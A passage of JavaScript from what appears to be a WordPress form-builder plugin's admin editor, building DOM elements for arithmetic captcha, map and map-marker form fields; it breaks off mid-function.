	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_arithmetic_captcha');

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_arithmetic_captcha");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
		
	var adding = document.createElement('img');
		adding.setAttribute("type", type);
		adding.setAttribute("operations_count", w_count);
		adding.setAttribute("operations", w_operations);
		adding.setAttribute("input_size", w_input_size);
		adding.setAttribute("src", url_for_ajax + "?action=formcontactwdmathcaptcha&operations_count="+w_count+"&operations="+w_operations.replace("+", "@")+"&i=form_id_temp");
		adding.setAttribute("id", "_wd_arithmetic_captchaform_id_temp");
		adding.setAttribute("class", "arithmetic_captcha_img");
		adding.setAttribute("onClick", "captcha_refresh('_wd_arithmetic_captcha','form_id_temp')");
			
	var refresh_captcha = document.createElement("div");
		refresh_captcha.setAttribute("class", "captcha_refresh");
		refresh_captcha.setAttribute("id", "_element_refreshform_id_temp");
		refresh_captcha.setAttribute("onClick", "captcha_refresh('_wd_arithmetic_captcha','form_id_temp')");

	var input_captcha = document.createElement("input");
		input_captcha.setAttribute("type", "text");
		input_captcha.style.cssText = "width:"+w_input_size+"px;";
		input_captcha.setAttribute("class", "arithmetic_captcha_input");
		input_captcha.setAttribute("id", "_wd_arithmetic_captcha_inputform_id_temp");
		input_captcha.setAttribute("name", "arithmetic_captcha_input");
		input_captcha.setAttribute("onKeyPress", "return check_isnum(event)");

	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
	var captcha_table = document.createElement('div');
		captcha_table.style.display="table";
	
	var captcha_tr1 = document.createElement('div');
		captcha_tr1.style.display="table-row";
	var captcha_tr2 = document.createElement('div');
		captcha_tr2.style.display="table-row";

	var captcha_td1 = document.createElement('div');
		captcha_td1.style.display="table-cell";

	var captcha_td2 = document.createElement('div');
		captcha_td2.style.cssText = "display:table-cell; vertical-align:middle;";
	var captcha_td3 = document.createElement('div');
		captcha_td3.style.display="table-cell";
	
	captcha_table.appendChild(captcha_tr1);
	captcha_table.appendChild(captcha_tr2);
	captcha_tr1.appendChild(captcha_td1);
	captcha_tr1.appendChild(captcha_td3);
	captcha_tr1.appendChild(captcha_td2);
	captcha_td1.appendChild(adding);
	captcha_td2.appendChild(refresh_captcha);
	captcha_td3.appendChild(input_captcha);
	
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
      
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
	    
	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_element.appendChild(adding_type);
	div_element.appendChild(captcha_table);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);
	
	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_arithmetic_captcha');
}

function type_map(i, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value)
{
    document.getElementById("element_type").value = "type_map";
	delete_last_child();

	var edit_div = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");

	var edit_main_table = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');			
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.setAttribute("colspan", "4");
		edit_main_td7.setAttribute("id", "markers");
		
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');		
		
	var center1 = document.createElement('p');
        center1.setAttribute("id", "center1");
		center1.setAttribute("class", "fm-editable-label");
		center1.innerHTML = "Drag the marker to change marker position.";
	  
	var el_label_location = document.createElement('label');
	    el_label_location.setAttribute("class", "fm-field-label");
		el_label_location.innerHTML = "Location";
		
	var el_img_add_marker = document.createElement('img');
        el_img_add_marker.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
	    el_img_add_marker.style.cssText ="cursor:pointer";
        el_img_add_marker.setAttribute("onClick", "add_marker('"+i+"', -1)");

	var el_label_map_size = document.createElement('label');
		el_label_map_size.setAttribute("class", "fm-field-label");
		el_label_map_size.innerHTML = "Map size";
	
	var el_map_width = document.createElement('input');
        el_map_width.setAttribute("type", "text");
        el_map_width.setAttribute("value", w_width);
        el_map_width.style.cssText ="margin-left:18px";
 		el_map_width.setAttribute("onKeyPress", "return check_isnum(event)");
        el_map_width.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value);");

	Width = document.createTextNode("Width");
		
	var el_map_height = document.createElement('input');
        el_map_height.setAttribute("type", "text");
        el_map_height.setAttribute("value", w_height);
		el_map_height.style.cssText = "margin-left:15px";
      	el_map_height.setAttribute("onKeyPress", "return check_isnum(event)");
	    el_map_height.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value);");
	
	Height = document.createTextNode("Height");
	
	var el_public_label = document.createElement('label');
		el_public_label.setAttribute("for", "public_key");
		el_public_label.setAttribute("class", "fm-field-label");
		el_public_label.innerHTML = "Key";
	
	var el_public_link = document.createElement('a');
        el_public_link.setAttribute("href", admin_url +"?page=goptions_fmc");
		el_public_link.setAttribute("class", "fm-field-recaptcha-label");
		el_public_link.setAttribute("target", "_blank");
		el_public_link.innerHTML ='To set up map key click here';
	
	
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.style.cssText = "width:200px;";
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");        
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText = "color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n = w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';	
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
			
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}
		
	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	
	edit_main_td2.appendChild(el_label_location);
	edit_main_td2.appendChild(center1);
	edit_main_td2.appendChild(el_img_add_marker);
	edit_main_td2.setAttribute("colspan", "2");

	edit_main_td3.appendChild(el_label_map_size);
	edit_main_td3_1.appendChild(Width);
	edit_main_td3_1.appendChild(el_map_width);
	edit_main_td3_1.appendChild(br);
	edit_main_td3_1.appendChild(Height);
	edit_main_td3_1.appendChild(el_map_height);

	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br1);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");	
	
	edit_main_td8.appendChild(el_public_label);
	edit_main_td8_1.appendChild(el_public_link);
	
	
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);	
	edit_main_tr8.appendChild(edit_main_td8);	
	edit_main_tr8.appendChild(edit_main_td8_1);	
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	t.appendChild(edit_div);

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_map");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	
	var adding = document.createElement('div');
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.style.cssText = "width:"+w_width+"px; height: "+w_height+"px";
		adding.setAttribute("zoom", w_zoom);
		adding.setAttribute("center_x", w_center_x);
		adding.setAttribute("center_y", w_center_y);
		
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = "map_"+i;
		label.style.cssText = 'display:none';
		
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br2);
	main_td.appendChild(div);
	
	change_class(w_class, i);
	refresh_attr(i, 'type_text');
	if_gmap_init(i);
	
	n = w_long.length;
	for(j=0; j<n; j++)
		add_marker(i,j, w_long[j], w_lat[j], w_info[j]);
}


function add_marker(id, i, w_long, w_lat, w_info) {
	edit_main_td7=document.getElementById('markers');
	if(i==-1) {
		if(edit_main_td7.lastChild)
			i = parseInt(edit_main_td7.lastChild.getAttribute("idi"))+1;
		else
			i = 0;
		w_long = null;
		w_lat = null;
		w_info = '';
	}
	
	var table_marker = document.createElement('table');
		table_marker.setAttribute("width", "100%");
		table_marker.setAttribute("border", "0");
		table_marker.setAttribute("id", "marker_opt"+i);
		table_marker.setAttribute("idi", i);

	var tr_marker = document.createElement('tr');
	var tr_hr = document.createElement('tr');
	
	var td_marker = document.createElement('td');
	var td_X = document.createElement('td');
	var td_hr = document.createElement('td');
		td_hr.setAttribute("colspan", "3");
		
	tr_hr.appendChild(td_hr);
	tr_marker.appendChild(td_marker);
	tr_marker.appendChild(td_X);
	table_marker.appendChild(tr_marker);
	table_marker.appendChild(tr_hr);
		
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');

	var hr = document.createElement('hr');
		hr.setAttribute("id", "br"+i);
		
	var el_info_textarea = document.createElement('textarea');
		el_info_textarea.setAttribute("id", "info"+i);
		el_info_textarea.setAttribute("rows", "3");
		el_info_textarea.setAttribute("value", w_info);
		el_info_textarea.setAttribute("onKeyUp", "change_info(this.value,'"+id+"','"+i+"')");
		el_info_textarea.innerHTML=w_info;
	
	var Marker_info = document.createElement('label');
		Marker_info.style.cssText =" font-size: 12px; vertical-align:top; margin-right:38px; font-weight:bold;";
		Marker_info.innerHTML = "Marker Info";
	
	var el_map_address = document.createElement('input');
		el_map_address.setAttribute("id", "addrval"+i);
		el_map_address.setAttribute("type", "text");
		el_map_address.setAttribute("value", "");
		el_map_address.setAttribute("size", "40");
		el_map_address.setAttribute("onchange", "changeAddress("+id+","+i+")");

	var Address = document.createElement('label');
		Address.style.cssText =" font-size: 12px; vertical-align:top; margin-right:59px; font-weight:bold;";
		Address.innerHTML = "Address";
	
	var el_map_longitude = document.createElement('input');
		el_map_longitude.setAttribute("id", "longval"+i);
		el_map_longitude.setAttribute("type", "text");
		el_map_longitude.setAttribute("value", w_long);
		el_map_longitude.setAttribute("size", "10");
		el_map_longitude.setAttribute("onkeyup", "update_position("+id+", "+i+");");
		
	var Longitude = document.createElement('label');
		Longitude.style.cssText =" font-size: 12px; vertical-align:top; margin-right:47px; font-weight:bold;";
		Longitude.innerHTML = "Longitude";
		
	var el_map_latitude = document.createElement('input');
		el_map_latitude.setAttribute("id", "latval"+i);
		el_map_latitude.setAttribute("type", "text");
		el_map_latitude.setAttribute("value", w_lat);
		el_map_latitude.setAttribute("size", "10");
		el_map_latitude.setAttribute("onkeyup", "update_position("+id+", "+i+");");
	
	var Latitude = document.createElement('label');
		Latitude.style.cssText =" font-size: 12px; vertical-align:top; margin-right:57px; font-weight:bold;";
		Latitude.innerHTML = "Latitude";
		
	var el_choices_remove = document.createElement('img');
		el_choices_remove.setAttribute("id", "el_button"+i+"_remove");
		el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
		el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
		el_choices_remove.setAttribute("align", 'top');
		el_choices_remove.setAttribute("onClick", "remove_map("+id+","+i+")");
			
		td_hr.appendChild(hr);
		
		
		td_marker.appendChild(Address);
		td_marker.appendChild(el_map_address);
		td_marker.appendChild(br1);
		td_marker.appendChild(Longitude);
		td_marker.appendChild(el_map_longitude);
		td_marker.appendChild(br2);
		td_marker.appendChild(Latitude);
		td_marker.appendChild(el_map_latitude);
		td_marker.appendChild(br3);
		td_marker.appendChild(Marker_info);
		td_marker.appendChild(el_info_textarea);
		td_X.appendChild(el_choices_remove);
		edit_main_td7.appendChild(table_marker);
	
	var adding = document.getElementById(id+"_elementform_id_temp")
		adding.setAttribute("long"+i, w_long);
		adding.setAttribute("lat"+i, w_lat);
 		adding.setAttribute("info"+i, w_info);
  
	add_marker_on_map(id, i, w_long, w_lat, w_info, true);
}

function remove_map(id,i)
{
	table=document.getElementById('marker_opt'+i);
	table.parentNode.removeChild(table);
	map=document.getElementById(id+"_elementform_id_temp");
	map.removeAttribute("long"+i);
	map.removeAttribute("lat"+i);
 	map.removeAttribute("info"+i);

	reomve_marker(id,i);
}



function type_mark_map(i, w_field_label, w_field_label_size, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value)
{
    document.getElementById("element_type").value = "type_mark_map";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
	var edit_main_tr11  = document.createElement('tr');
	var edit_main_tr12  = document.createElement('tr');
	
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');		
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');	
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
	var edit_main_td12 = document.createElement('td');
	var edit_main_td12_1 = document.createElement('td');

	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.style.cssText = "width:200px;";
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
		
	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
        el_label_left.innerHTML = "Left";
		
	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
        el_label_top.innerHTML = "Top";	
		
	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var center1 = document.createElement('p');
		center1.setAttribute("class", "fm-field-label");
		center1.innerHTML = "Drag the marker to change default marker position.";
	  
	var el_label_location = document.createElement('label');
		el_label_location.setAttribute("class", "fm-field-label");
		el_label_location.innerHTML = "Default Location";
	
	var el_map_address = document.createElement('input');
		el_map_address.setAttribute("id", "addrval0");
		el_map_address.setAttribute("type", "text");
		el_map_address.setAttribute("value", "");
		el_map_address.setAttribute("size", "40");
        el_map_address.setAttribute("onchange", "changeAddress("+i+",0)");
	
	var el_map_address_label = document.createElement('label');
		el_map_address_label.setAttribute("class", "fm-field-label");
		el_map_address_label.setAttribute("for", "addrval0");
		el_map_address_label.innerHTML = "Address";
	
	var el_map_longitude = document.createElement('input');
		el_map_longitude.setAttribute("id", "longval0");
		el_map_longitude.setAttribute("type", "text");
		el_map_longitude.setAttribute("value", w_long);
		el_map_longitude.setAttribute("size", "10");
		el_map_longitude.setAttribute("onkeyup", "update_position("+i+", 0);");
	
	var el_map_longitude_label = document.createElement('label');
		el_map_longitude_label.setAttribute("class", "fm-field-label");
		el_map_longitude_label.setAttribute("for", "longval0");
		el_map_longitude_label.innerHTML = "Longitude";
		
	var el_map_latitude = document.createElement('input');
		el_map_latitude.setAttribute("id", "latval0");
		el_map_latitude.setAttribute("type", "text");
		el_map_latitude.setAttribute("value", w_lat);
		el_map_latitude.setAttribute("size", "10");
		el_map_latitude.setAttribute("onkeyup", "update_position("+i+", 0);");
		
	var el_map_latitude_label = document.createElement('label');
		el_map_latitude_label.setAttribute("class", "fm-field-label");
		el_map_latitude_label.setAttribute("for", "latval0");
		el_map_latitude_label.innerHTML = "Latitude";			

	var el_label_map_size = document.createElement('label');
		el_label_map_size.setAttribute("class", "fm-field-label");
		el_label_map_size.innerHTML = "Map size";
	
	var el_map_width = document.createElement('input');
		el_map_width.setAttribute("type", "text");
		el_map_width.setAttribute("value", w_width);
		el_map_width.style.cssText ="margin-left:10px; width:157px;";
 		el_map_width.setAttribute("onKeyPress", "return check_isnum(event)");
		el_map_width.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value);");

	Width = document.createTextNode("Width");
		
	var el_map_height = document.createElement('input');
		el_map_height.setAttribute("type", "text");
		el_map_height.setAttribute("value", w_height);
		el_map_height.style.cssText = "margin-left:6px; width:157px;";
		el_map_height.setAttribute("onKeyPress", "return check_isnum(event)");
		el_map_height.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value);");
		
	Height = document.createTextNode("Height");
	
	var el_public_label = document.createElement('label');
		el_public_label.setAttribute("for", "public_key");
		el_public_label.setAttribute("class", "fm-field-label");
		el_public_label.innerHTML = "Key";
	
	var el_public_link = document.createElement('a');
        el_public_link.setAttribute("href", admin_url +"?page=goptions_fmc");
		el_public_link.setAttribute("class", "fm-field-recaptcha-label");
		el_public_link.setAttribute("target", "_blank");
		el_public_link.innerHTML ='To set up map key click here';
	
	
	var el_info_label = document.createElement('label');
		el_info_label.setAttribute("class", "fm-field-label");
		el_info_label.setAttribute("for", "info0");
		el_info_label.innerHTML = "Marker Info";
		
	
	var el_info_textarea = document.createElement('textarea');
		el_info_textarea.setAttribute("id", "info0");
		el_info_textarea.setAttribute("rows", "3");
 		el_info_textarea.setAttribute("value", w_class);
		el_info_textarea.style.cssText = "width:200px; margin-left:2px";
		el_info_textarea.setAttribute("onKeyUp", "change_info(this.value,'"+i+"','"+0+"')");
		el_info_textarea.innerHTML = w_info;
		
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.style.cssText = "width:200px;";
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");       
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');        
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n = w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
